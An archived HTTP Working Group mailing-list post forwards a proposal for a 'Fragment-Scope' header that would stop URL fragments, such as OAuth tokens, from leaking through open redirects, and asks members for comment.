- From: Mark Nottingham <mnot@mnot.net>
- Date: Fri, 9 Jan 2015 14:56:22 -0500
- To: HTTP Working Group <ietf-http-wg@w3.org>
Brad Hill brought up an interesting proposal on the repo (I closed the issue as it was in the wrong place). —8<--- A recurring weakness with OAuth and related capability URL usages (http://www.w3.org/TR/capability-urls/) is the reapplication of URL fragments on redirects: http://tools.ietf.org/html/rfc7231#section-9.5 This behavior is frequently abused in combination with resources that act as open redirectors to leak sensitive information in a fragment. I would like to suggest an additional header, 'Fragment-Scope' that could be sent with a Location header on a 3xx to control the disposition of a fragment after a redirect. Values would be 'no-redirect' which would instruct the user agent to discard the fragment on any subsequent redirect, or 'same-origin' which would discard the fragment after any non-same-origin redirect. The scope rule, once set, would remain until the user agent terminates following redirects. (so a 'same-origin' policy could not be stripped by redirecting to a second open-redirector in the same origin, and then off-origin from there). —>8— What do people think? -- Mark Nottingham http://www.mnot.net/
Received on Friday, 9 January 2015 19:56:50 UTC